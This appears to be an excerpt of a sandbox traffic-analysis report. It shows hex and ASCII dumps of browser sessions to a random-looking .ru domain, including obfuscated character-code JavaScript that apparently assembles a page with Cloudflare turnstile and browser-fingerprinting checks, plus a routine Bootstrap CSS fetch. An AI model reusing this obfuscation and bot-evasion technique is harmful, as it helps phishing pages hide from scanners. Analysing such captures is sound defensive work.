                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 63 70 5b 39 38 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 39 39 5d 20 3d 20 31 30 33 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 30 5d 20 3d 20 33 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 31 5d 20 3d 20 33 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 32 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 33 5d 20 3d 20 31 31 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 34 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 35 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 36 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 37 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 38 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 39 5d 20 3d 20 36 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 31 30 5d 20 3d
                                                                                                                                                                                    Data Ascii: cp[98] = 110;ZwvOgKcp[99] = 103;ZwvOgKcp[100] = 34;ZwvOgKcp[101] = 32;ZwvOgKcp[102] = 99;ZwvOgKcp[103] = 111;ZwvOgKcp[104] = 110;ZwvOgKcp[105] = 116;ZwvOgKcp[106] = 101;ZwvOgKcp[107] = 110;ZwvOgKcp[108] = 116;ZwvOgKcp[109] = 61;ZwvOgKcp[110] =
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 5d 20 3d 20 34 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 36 35 5d 20 3d 20 33 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 36 36 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 36 37 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 36 38 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 36 39 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 30 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 31 5d 20 3d 20 39 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 32 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 33 5d 20 3d 20 34 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 34 5d 20 3d 20 31 31 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 35 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 37 36 5d 20 3d 20 39 37 3b 0a
                                                                                                                                                                                    Data Ascii: ] = 44;ZwvOgKcp[165] = 32;ZwvOgKcp[166] = 105;ZwvOgKcp[167] = 110;ZwvOgKcp[168] = 105;ZwvOgKcp[169] = 116;ZwvOgKcp[170] = 105;ZwvOgKcp[171] = 97;ZwvOgKcp[172] = 108;ZwvOgKcp[173] = 45;ZwvOgKcp[174] = 115;ZwvOgKcp[175] = 99;ZwvOgKcp[176] = 97;
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 77 76 4f 67 4b 63 70 5b 32 33 31 5d 20 3d 20 31 31 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 32 5d 20 3d 20 31 31 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 33 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 34 5d 20 3d 20 31 31 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 35 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 36 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 37 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 38 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 33 39 5d 20 3d 20 34 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 34 30 5d 20 3d 20 31 31 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 34 31 5d 20 3d 20 34 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 34 32 5d 20 3d 20 34 37 3b 0a 5a 77 76 4f 67 4b 63
                                                                                                                                                                                    Data Ascii: wvOgKcp[231] = 117;ZwvOgKcp[232] = 114;ZwvOgKcp[233] = 110;ZwvOgKcp[234] = 115;ZwvOgKcp[235] = 116;ZwvOgKcp[236] = 105;ZwvOgKcp[237] = 108;ZwvOgKcp[238] = 101;ZwvOgKcp[239] = 47;ZwvOgKcp[240] = 118;ZwvOgKcp[241] = 48;ZwvOgKcp[242] = 47;ZwvOgKc
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 63 70 5b 32 39 37 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 39 38 5d 20 3d 20 31 30 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 39 39 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 30 5d 20 3d 20 34 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 31 5d 20 3d 20 31 30 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 32 5d 20 3d 20 31 31 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 33 5d 20 3d 20 31 30 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 34 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 35 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 36 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 37 5d 20 3d 20 31 31 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 38 5d 20 3d 20 31 31 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30
                                                                                                                                                                                    Data Ascii: cp[297] = 99;ZwvOgKcp[298] = 100;ZwvOgKcp[299] = 110;ZwvOgKcp[300] = 46;ZwvOgKcp[301] = 106;ZwvOgKcp[302] = 115;ZwvOgKcp[303] = 100;ZwvOgKcp[304] = 101;ZwvOgKcp[305] = 108;ZwvOgKcp[306] = 105;ZwvOgKcp[307] = 118;ZwvOgKcp[308] = 114;ZwvOgKcp[30
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 3d 20 39 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 34 5d 20 3d 20 33 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 35 5d 20 3d 20 31 30 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 36 5d 20 3d 20 31 31 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 37 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 38 5d 20 3d 20 31 30 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 39 5d 20 3d 20 36 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 30 5d 20 3d 20 33 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 31 5d 20 3d 20 31 30 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 32 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 33 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 34 5d 20 3d 20 31 31 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 35 5d 20 3d 20 31 31 35 3b 0a
                                                                                                                                                                                    Data Ascii: = 97;ZwvOgKcp[364] = 32;ZwvOgKcp[365] = 104;ZwvOgKcp[366] = 114;ZwvOgKcp[367] = 101;ZwvOgKcp[368] = 102;ZwvOgKcp[369] = 61;ZwvOgKcp[370] = 34;ZwvOgKcp[371] = 104;ZwvOgKcp[372] = 116;ZwvOgKcp[373] = 116;ZwvOgKcp[374] = 112;ZwvOgKcp[375] = 115;
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 33 30 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 31 5d 20 3d 20 31 31 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 32 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 33 5d 20 3d 20 31 31 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 34 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 35 5d 20 3d 20 36 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 36 5d 20 3d 20 34 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 37 5d 20 3d 20 31 31 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 38 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 33 39 5d 20 3d 20 31 31 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 34 30 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 34 31 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 34 32 5d 20 3d 20 31
                                                                                                                                                                                    Data Ascii: 30] = 99;ZwvOgKcp[431] = 114;ZwvOgKcp[432] = 105;ZwvOgKcp[433] = 112;ZwvOgKcp[434] = 116;ZwvOgKcp[435] = 62;ZwvOgKcp[436] = 40;ZwvOgKcp[437] = 115;ZwvOgKcp[438] = 99;ZwvOgKcp[439] = 114;ZwvOgKcp[440] = 101;ZwvOgKcp[441] = 101;ZwvOgKcp[442] = 1
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 39 37 5d 20 3d 20 34 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 39 38 5d 20 3d 20 31 31 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 39 39 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 30 5d 20 3d 20 31 31 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 31 5d 20 3d 20 31 30 33 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 32 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 33 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 34 5d 20 3d 20 31 31 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 35 5d 20 3d 20 34 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 36 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 37 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 30 38 5d 20 3d 20 31 31 30 3b 0a 5a 77
                                                                                                                                                                                    Data Ascii: 4;ZwvOgKcp[497] = 46;ZwvOgKcp[498] = 112;ZwvOgKcp[499] = 108;ZwvOgKcp[500] = 117;ZwvOgKcp[501] = 103;ZwvOgKcp[502] = 105;ZwvOgKcp[503] = 110;ZwvOgKcp[504] = 115;ZwvOgKcp[505] = 46;ZwvOgKcp[506] = 108;ZwvOgKcp[507] = 101;ZwvOgKcp[508] = 110;Zw
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 67 4b 63 70 5b 35 36 33 5d 20 3d 20 34 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 34 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 35 5d 20 3d 20 39 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 36 5d 20 3d 20 31 30 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 37 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 38 5d 20 3d 20 34 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 36 39 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37 30 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37 31 5d 20 3d 20 39 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37 32 5d 20 3d 20 31 30 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37 33 5d 20 3d 20 31 31 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37 34 5d 20 3d 20 31 30 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 37
                                                                                                                                                                                    Data Ascii: gKcp[563] = 46;ZwvOgKcp[564] = 110;ZwvOgKcp[565] = 97;ZwvOgKcp[566] = 109;ZwvOgKcp[567] = 101;ZwvOgKcp[568] = 46;ZwvOgKcp[569] = 105;ZwvOgKcp[570] = 110;ZwvOgKcp[571] = 99;ZwvOgKcp[572] = 108;ZwvOgKcp[573] = 117;ZwvOgKcp[574] = 100;ZwvOgKcp[57


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.164973035.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:29 UTC578OUTOPTIONS /report/v3?s=x3TYwlaqsyOhwm2S9MZBAtjo4fPOvx4m1v39y%2FH8AGcQh6la3Zr%2BBsw1d2tnhxGnOhEclm9BX1Fj6pROtWkg8OpxCIGtAbcMnafyA4FSdPAL7pzaDAIYlcKWwRevy%2BbV78aJZ653j4vwfynH4f5vEhwVv9w%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Origin: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:29 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                    date: Fri, 26 Jan 2024 13:41:29 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.1649732151.101.65.2294436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:29 UTC593OUTGET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                                                    Host: cdn.jsdelivr.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:29 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 155845
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: *
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                    Content-Type: text/css; charset=utf-8
                                                                                                                                                                                    X-JSD-Version: 5.0.2
                                                                                                                                                                                    X-JSD-Version-Type: version
                                                                                                                                                                                    ETag: W/"260c5-fByeBXPlzqi603M74vxjqoxo6o0"
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:29 GMT
                                                                                                                                                                                    Age: 4536498
                                                                                                                                                                                    X-Served-By: cache-fra-eddf8230097-FRA, cache-pdk-kfty2130038-PDK
                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d
                                                                                                                                                                                    Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 6f 72 64 65 72 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 32 35 7d 68 72 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 7b 68 65 69 67 68 74 3a 31 70 78 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29
                                                                                                                                                                                    Data Ascii: herit;background-color:currentColor;border:0;opacity:.25}hr:not([size]){height:1px}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px)
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 5b 63 6c 61 73 73 5d 29 2c 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 5d 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 75 6e 69 63 6f 64 65 2d 62 69 64 69 3a 62 69 64 69 2d 6f 76 65 72 72 69 64 65 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74
                                                                                                                                                                                    Data Ascii: [class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--bs-font-monospace);font-size:1em;direction:ltr;unicode-bidi:bidi-override}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 62 75 74 74 6f 6e 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d
                                                                                                                                                                                    Data Ascii: not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 63 28 31 2e 35 32 35 72 65 6d 20 2b 20 33 2e 33 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                                                    Data Ascii: c(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-siz
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 2e 37 35 72 65 6d 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 2c 2e 37 35 72 65 6d 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b
                                                                                                                                                                                    Data Ascii: .75rem);padding-left:var(--bs-gutter-x,.75rem);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 66 6c 65 78 3a 31
                                                                                                                                                                                    Data Ascii: -2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:768px){.col-md{flex:1
